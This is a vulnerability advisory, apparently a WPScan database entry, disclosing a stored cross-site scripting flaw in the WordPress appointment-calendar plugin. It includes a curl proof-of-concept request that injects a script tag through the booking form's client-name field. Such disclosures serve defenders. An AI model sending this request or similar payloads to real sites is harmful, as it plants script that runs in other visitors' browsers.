Appointment Calendar - Stored Cross-Site Scripting (XSS)
Sign up to our free email alerts service for instant vulnerability notifications!| Description | When user submist data from appointments there is no validation which leads to stored XSS. |
| Proof of Concept | curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Host: localhost' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0' -H 'X-Requested-With: XMLHttpRequest' --data 'ServiceId=1&AppDate=02-11-2016&StartTime=10:30 AM&Client_Name=<script>alert("hello")</script>&Client_Email=test@test.com&Client_Phone=123456&Client_Note=&Service_Duration=30' |
Affects
| Plugin |
appointment-calendar
|
References
| URL | https://wordpress.org/plugins/appointment-calendar/ |
Classification
| Type | XSS |
| OWASP Top 10 | A3: Cross-Site Scripting (XSS) |
| CWE | CWE-79 |
Miscellaneous
| Submitter | Naeem Shah |
| Views | 178 |
| Verified | No |
| WPVDB ID | 8633 |
Timeline
| Publicly Published | 2016-09-30 (10 months ago) |
| Added | 2016-10-01 (10 months ago) |
| Last Updated | 2016-10-01 (10 months ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
